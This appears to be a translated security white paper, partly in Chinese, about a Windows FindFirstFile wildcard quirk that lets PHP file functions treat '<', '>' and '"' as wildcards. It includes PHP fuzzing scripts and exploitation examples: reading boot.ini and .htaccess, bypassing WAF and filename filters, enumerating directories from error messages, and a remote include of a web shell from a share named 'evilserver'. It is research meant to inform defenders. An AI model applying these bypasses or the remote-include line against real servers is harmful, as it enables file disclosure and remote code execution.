1. Opening remarks
What is disclosed this time are the test results obtained from the questions asked on the following web page:
http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
<?php
for ($i=0; $i<255; $i++) {
$url = '1.ph' . chr($i);
$tmp = @file_get_contents($url);
if (!empty($tmp)) echo chr($i) . "\r\n";
}
?>
It is known that 1.php exists. The result of the above script access is:
1.php 1.phP 1.ph< 1.ph>
can all be returned.
The first two types of return results are generally known (because the Windows file system supports the size conversion mechanism), and the other two types of returns have attracted our attention.
Test php version: PHP4.9, PHP5.2, PHP5.3, PHP6.0
Test system: WINXP SP3 X32, WINXP SP2 X64, WIN7, WIN2K3
After testing, we concluded that this vulnerability affects all windows+php versions
2. In-depth exploration of the results of fuzz testing
In order to continue to explore more information about this bug, we have made some modifications to the demo:
<?php
for ($j=0; $i<256; $j++) {
for ($i=0; $i<256; $i++) {
$url = '1.p' . chr($j) . chr($i);
$tmp = @file_get_contents($url);
if (!empty($tmp)) echo chr($j) . chr($i) . "\r\n";
}
}
?>
During the process of debugging the PHP interpreter, we attributed this "magical" vulnerability to the result of a Winapi function FindFirstFile() (http://msdn.microsoft.com/en-us/library/aa364418 (v=vs.85).aspx). What’s more interesting is that when tracing the function call stack, we found that the character ">" was replaced by "?", and the character "<" was replaced by "*", The symbol "(double quote) is replaced by a "." character. This is mentioned in the 2007 msdn public document: http://msdn.microsoft.com/en-us/library/community/history/aa364418 %28v=vs.85%29.aspx?id=3
However, this bug has not been fixed in any version released by Windows!
What we want to explain is that the function FindFirstFile() is far less useful than file_get_contents() under PHP. We have listed the following table for the functions that can be used by this bug:
In addition, we also found that this exploit can also be applied to C++. The following example is from msdn:
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
void _tmain(int argc, TCHAR *argv[])
{
WIN32_FIND_DATA FindFileData;
HANDLE hFind;
if( argc != 2 )
{
_tprintf(TEXT("Usage: %s [target_file]\n"), argv[0]);
return;
}
_tprintf (TEXT("Target file is %s\n"), argv[1]);
hFind = FindFirstFile(argv[1], &FindFileData);
if (hFind == INVALID_HANDLE_VALUE)
{
printf ("FindFirstFile failed (%d)\n", GetLastError());
return;
}
else
{
_tprintf (TEXT("The first file found is %s\n"),
FindFileData.cFileName);
FindClose(hFind);
}
}
当传入参数”c:\bo<”时,成功访问到boot.ini文件。
3.利用方法总结
当调用FindFirstFile()函数时,”<”被替换成”*”,这意味该规则可以使”<”替换多个任意字符,但是测试中发现并不是所有情况都如我们所愿。所以,为了确保能够使”<”被替换成”*”,应当采用”<<”
EXAMPLE:include(‘shell<'); 或者include(‘shell<<'); //当文件夹中超过一个以shell打头的文件时,该执行取按字母表排序后的第一个文件。
当调用FindFirstFile()函数时,”>”被替换成”?”,这意味这”>”可以替换单个任意字符
EXAMPLE:include(‘shell.p>p'); //当文件中超过一个以shell.p?p 通配时,该执行取按字母表排序后的第一个文件。
当调用FindFirstFile()函数时,”””(双引号)被替换成”.”
EXAMPLE:include(‘shell”php'); //===>include(‘shell.php');
如果文件名第一个字符是”.”的话,读取时可以忽略之
EXAMPLE:fopen(‘.htacess'); //==>fopen(‘htacess'); //加上第一点中的利用 ==>fopen(‘h<<');
文件名末尾可以加上一系列的/或者\的合集,你也可以在/或者\中间加上.字符,只要确保最后一位为”.”
EXAMPLE:fopen(“config.ini\\.// \/\/\/.”);==> fopen(‘config.ini\./.\.'); ==>fopen(‘config.ini/////.')==>fopen(‘config.ini…..') //译者注:此处的利用我不是很理解,有何作用?截断?
该函数也可以调用以”\\”打头的网络共享文件,当然这会耗费不短的时间。补充一点,如果共享名不存在时,该文件操作将会额外耗费4秒钟的时间,并可能触发时间响应机制以及max_execution_time抛错。所幸的是,该利用可以用来绕过allow_url_fopen=Off 并最终导致一个RFI(远程文件包含)
EXAMPLE:include (‘\\evilserver\shell.php');
用以下方法还可以切换文件的盘名
include(‘\\.\C:\my\file.php\..\..\..\D:\anotherfile.php');
选择磁盘命名语法可以用来绕过斜线字符过滤
file_get_contents(‘C:boot.ini'); //==> file_get_contents (‘C:/boot.ini');
在php的命令行环境下(php.exe),关于系统保留名文件的利用细节
EXAMPLE:file_get_contents(‘C:/tmp/con.jpg'); //此举将会无休无止地从CON设备读取0字节,直到遇到eof
EXAMPLE:file_put_contents(‘C:/tmp/con.jpg',chr(0×07)); //此举将会不断地使服务器发出类似哔哔的声音
4.更深入的利用方法
除了以上已经展示的方法,你可以用下面的姿势来绕过WAF或者文件名过滤
请思考该例:
<?php
file_get_contents("/images/".$_GET['a'].".jpg");
//or another function from Table 1, i.e. include().
?>
访问test.php?a=../a<%00
可能出现两种结果
Warning: include(/images/../a<) [function.include]: failed to open stream:Invalid argument in。。。 Warning: include(/images/../a<) [function.include]: failed to open stream:Permission denied。。
如果是第一种情况,说明不存在a打头的文件,第二种则存在。
此外,有记录显示,有时网站会抛出如下错误:
Warning: include(/admin_h1d3) [function.include]: failed to open stream: Permission denied..
这说明该文件夹下存在一个以上以a打头的文件(夹),并且第一个就是admin_h1d3。
5.结论
实验告诉我们,php本身没有那么多的漏洞,我们所看到是:过分的依赖于另一种程序语言(注:如文中的漏洞产自与winapi的一个BUG),并且直接强 制使用,将会导致细微的错误(bug),并最终造成危害(vul).这样便拓宽了模糊测试的范畴(译者注:并不仅仅去研究web层面,而深入到系统底层),并最终导致IDS,IPS的规则更新。诚然,代码需要保护,需要补丁,需要升级与扩充。但是,这并不是我们真正要去关注的问题。在当下,我认为我们 更谨慎地去书写更多更严厉的过滤规则,正如我们一直在做的一样。任重道远,精益求精。
因为这是基础应用层的问题,所以我们猜想类似的问题可能出现在其他web应用中。于是我们还测试了mysql5,而实验结果表明,mysql5并不存在类似的漏洞。但是我们仍认为:类似的漏洞将会出现在诸如Perl、Python、Ruby等解释性语言上。
6.Referer
PHP application source code audits advanced technology: http://code.google.com/p/pasc2at/wiki/SimplifiedChinese MSDN FindFirstFile Function reference: http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx MSDN comments history: http://msdn.microsoft.com/en-us/library/community/history/aa364418(v=vs.85).aspx?id=3 MSDN article «Naming Files, Paths, and Namespaces»: http://msdn.microsoft.com/en-us/library/aa365247(v=vs.85).aspx Technet article «Managing Files and Directories»: http://technet.microsoft.com/en-us/library/cc722482.aspx Paper «Technique of quick exploitation of 2blind SQL Injection»: http://www.exploit-db.com/papers/13696/
================================================= ===================
Complete text.
Note: This article is a white paper published at the end of 2011, and the bug still exists. I came across an exploit of this bug when I was working on a CTF for CUIT a few months ago. I read this article at that time. I just read it briefly and wrote a php script to run the directory. I have nothing to do now, so I did some translation and sorting.
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
